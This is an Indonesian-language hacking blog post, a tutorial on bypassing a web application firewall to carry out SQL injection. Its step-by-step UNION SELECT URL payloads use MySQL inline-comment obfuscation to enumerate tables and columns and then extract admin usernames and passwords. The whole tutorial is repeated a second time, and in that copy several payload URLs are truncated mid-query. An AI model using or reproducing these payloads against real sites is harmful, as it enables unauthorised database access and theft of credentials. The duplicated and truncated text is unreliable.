:v malem om2 master :3
kali ini, aq Ch0c0 ... newbie yg hina (slalu dipanggil master :v, pdahal mzii newbie XD)
akan memberikan sesuatu yang baru :v
Bypass firewall SQLI...
waktu sqli pasti waktu buka pake --> www.site-bokep.com/large.php?CleanUrl=&mID=297&sID=313&PID=-2109 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14--
pasti muncul error 403.php :v
truz piye ?? :v
gini cara bypassnya :3
pake keyword : +/*! ama +/*
contohnya :
http://www.site-bokep.com/large.php?CleanUrl=&mID=297&sID=313&PID=-2109+/*!union*/+/*!select*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
sukses bypass :v
xixixixiixixiii :3
ntar muncul angka mantranya :v (nomor exploit) di title bar ama dimana gitu :3 pokoknya kliatan dehh...
tinggal cari tablenya om :v
http://www.site-bokep.com/large.php?CleanUrl=&mID=297&sID=313&PID=-2109+/*!union*/+/*!select*/+1,/*!table_name*/,3,4,5,6,7,8,9,10,11,12,13,14+from+/*!information_schema*/.tables+where+/ *!table_schema*/+like+database()+limit 0,1--
NOTE ::
--di sqLi baru, group_concat dah co.id om :v, jadi pake table_name langsung :3
xixixixiixixiii ... :3
-- limit0,1 dipake buat extract database om :v utk extract database lanjutannya, pake limit1,1 :3
nahh, tinggal cari lanjutannya :3
cari next database pake "limit 1,1" ntar jadinya gini :
http://www.site-bokep.com/large.php?CleanUrl=&mID=297&sID=313&PID=-2109+/*!union*/+/*!select*/+1,/*!table_name*/,3,4,5,6,7,8,9,10,11,12,13,14+from+/*!information_schema*/.tables+where+/ *!table_schema*/+like+database()+limit 1,1--
ntar nemu tablenya :v, contoh misal kalo lagi mujur nemu table admin :3 xixixixiixii...
kalo apes muncul table "hacked" :v wkwkkwkwkkk....
kalo udah liat tablenya, tinggal jadiin kalimat 'admin' ke char...
caranya tinggal convert di www.mbah-buyut-google.com :v
cari aja pake keyword : str to char atau ascii to char
ntar kalo udah, tinggal dijadiin begini om :v ::http://www.site-bokep.com/large.php?CleanUrl=&mID=297&sID=313&PID=-2109+/*!union*/+/*!select*/+1,/*!column_name*/,3,4,5,6,7,8,9,10,11,12,13,14+from+/*!information_schema*/.columns+where+/ *!table_name*/=char(97,100,109,105,110) limit 0,1--
97,100,109,105,110 = admin :3
langsung muncul column adminnya :v
itulah bilangan char, kalo ")(*()^&^$$%" tuhh bilangan ngawur :v wkwkwkkwk...
next step.
kalo column adminnya udah keluar (misal nama columnnya "username") maka tinggal nyari column passwordnya om :v
xixixiixixixii...
A: caranya gimana om ?? :v
B: :3 tanya omplong google :v wkwkkwkwkkk
caranya dapetin column password :
intinya :3 kalo table udah selesai di convert ke charset, maka limit 0,1 ama limit 1,1 itu berubah jadi next - back ...
kalo tadi muncul username di table admin urlnya kaya gini :http://www.site-bokep.com/large.php?CleanUrl=&mID=297&sID=313&PID=-2109+/*!union*/+/*!select*/+1,/*!column_name*/,3,4,5,6,7,8,9,10,11,12,13,14+from+/*!information_schema*/.columns+where+/ *!table_name*/=char(97,100,109,105,110) limit 0,1--
maka selanjutnya pasti jadi kaya bgini :
http://www.site-bokep.com/large.php?CleanUrl=&mID=297&sID=313&PID=-2109+/*!union*/+/*!select*/+1,/*!column_name*/,3,4,5,6,7,8,9,10,11,12,13,14+from+/*!information_schema*/.columns+where+/ *!table_name*/=char(97,100,109,105,110) limit 1,1--
ciluk baa :v
langsung muncul column passnya :3
A: kok isok om ?? :v brubah kyo power ranger laan :v
B: yyo isogh, jenenge sqli anyar :v , power ranger gundulmu :3 xiixixixixiii...
Lanjut Final Step.
terakhir, ini bagian yg seru :3
extract data dari table username dan password.
caranya tinggal extract 1 per 1... soalnya sqli baru :v bukan sqli lama ... yg langsung extract datanya :3
xixiixixixii... cara extract datanya mirip kaya sqli 'lawas', cman beda di syntaknya :3
seperti ini :
extract data column username :
http://site-bokep.com/large.php?CleanUrl=&mID=297&sID=313&PID=-2109+/*!union*/+/*!select*/+1,/*!Username*/,3,4,5,6,7,8,9,10,11,12,13,14+from+admin-
extract data column password :
http://www.site-bokep.com/large.php?CleanUrl=&mID=297&sID=313&PID=-2109+/*!union*/+/*!select*/+1,/*!Password*/,3,4,5,6,7,8,9,10,11,12,13,14+from+admin-
Sekian Tutorial dari Om Ch0c0 :v
xixixiixixii... :v
bLajar yg pinter, bokepnya dilebihin, pacarnya dibanyakin :v
wkwkkwkwkwkk...
Like This ! :*
Credit : S******* H*****
kali ini, aq Ch0c0 ... newbie yg hina (slalu dipanggil master :v, pdahal mzii newbie XD)
akan memberikan sesuatu yang baru :v
Bypass firewall SQLI...
waktu sqli pasti waktu buka pake --> www.site-bokep.com/large.php?CleanUrl=&mID=297&sID=313&PID=-2109 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14--
pasti muncul error 403.php :v
truz piye ?? :v
gini cara bypassnya :3
pake keyword : +/*! ama +/*
contohnya :
http://www.site-bokep.com/large.php?CleanUrl=&mID=297&sID=313&PID=-2109+/*!union*/+/*!select*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
sukses bypass :v
xixixixiixixiii :3
ntar muncul angka mantranya :v (nomor exploit) di title bar ama dimana gitu :3 pokoknya kliatan dehh...
tinggal cari tablenya om :v
http://www.site-bokep.com/large.php?CleanUrl=&mID=297&sID=313&PID=-2109+/*!union*/+/*!select*/+1,/*!table_name*/,3,4,5,6,7,8,9,10,11,12,13,14+from+/*!information_schema*/.tables+where+/
NOTE ::
--di sqLi baru, group_concat dah co.id om :v, jadi pake table_name langsung :3
xixixixiixixiii ... :3
-- limit0,1 dipake buat extract database om :v utk extract database lanjutannya, pake limit1,1 :3
nahh, tinggal cari lanjutannya :3
cari next database pake "limit 1,1" ntar jadinya gini :
http://www.site-bokep.com/large.php?CleanUrl=&mID=297&sID=313&PID=-2109+/*!union*/+/*!select*/+1,/*!table_name*/,3,4,5,6,7,8,9,10,11,12,13,14+from+/*!information_schema*/.tables+where+/
ntar nemu tablenya :v, contoh misal kalo lagi mujur nemu table admin :3 xixixixiixii...
kalo apes muncul table "hacked" :v wkwkkwkwkkk....
kalo udah liat tablenya, tinggal jadiin kalimat 'admin' ke char...
caranya tinggal convert di www.mbah-buyut-google.com :v
cari aja pake keyword : str to char atau ascii to char
ntar kalo udah, tinggal dijadiin begini om :v ::http://www.site-bokep.com/large.php?CleanUrl=&mID=297&sID=313&PID=-2109+/*!union*/+/*!select*/+1,/*!column_name*/,3,4,5,6,7,8,9,10,11,12,13,14+from+/*!information_schema*/.columns+where+/
97,100,109,105,110 = admin :3
langsung muncul column adminnya :v
itulah bilangan char, kalo ")(*()^&^$$%" tuhh bilangan ngawur :v wkwkwkkwk...
next step.
kalo column adminnya udah keluar (misal nama columnnya "username") maka tinggal nyari column passwordnya om :v
xixixiixixixii...
A: caranya gimana om ?? :v
B: :3 tanya omplong google :v wkwkkwkwkkk
caranya dapetin column password :
intinya :3 kalo table udah selesai di convert ke charset, maka limit 0,1 ama limit 1,1 itu berubah jadi next - back ...
kalo tadi muncul username di table admin urlnya kaya gini :http://www.site-bokep.com/large.php?CleanUrl=&mID=297&sID=313&PID=-2109+/*!union*/+/*!select*/+1,/*!column_name*/,3,4,5,6,7,8,9,10,11,12,13,14+from+/*!information_schema*/.columns+where+/
maka selanjutnya pasti jadi kaya bgini :
http://www.site-bokep.com/large.php?CleanUrl=&mID=297&sID=313&PID=-2109+/*!union*/+/*!select*/+1,/*!column_name*/,3,4,5,6,7,8,9,10,11,12,13,14+from+/*!information_schema*/.columns+where+/
ciluk baa :v
langsung muncul column passnya :3
A: kok isok om ?? :v brubah kyo power ranger laan :v
B: yyo isogh, jenenge sqli anyar :v , power ranger gundulmu :3 xiixixixixiii...
Lanjut Final Step.
terakhir, ini bagian yg seru :3
extract data dari table username dan password.
caranya tinggal extract 1 per 1... soalnya sqli baru :v bukan sqli lama ... yg langsung extract datanya :3
xixiixixixii... cara extract datanya mirip kaya sqli 'lawas', cman beda di syntaknya :3
seperti ini :
extract data column username :
http://site-bokep.com/large.php?CleanUrl=&mID=297&sID=313&PID=-2109+/*!union*/+/*!select*/+1,/*!Username*/,3,4,5,6,7,8,9,10,11,12,13,14+from+admin-
extract data column password :
http://www.site-bokep.com/large.php?CleanUrl=&mID=297&sID=313&PID=-2109+/*!union*/+/*!select*/+1,/*!Password*/,3,4,5,6,7,8,9,10,11,12,13,14+from+admin-
Sekian Tutorial dari Om Ch0c0 :v
xixixiixixii... :v
bLajar yg pinter, bokepnya dilebihin, pacarnya dibanyakin :v
wkwkkwkwkwkk...
Like This ! :*
Credit : S******* H*****
Tidak ada komentar:
Posting Komentar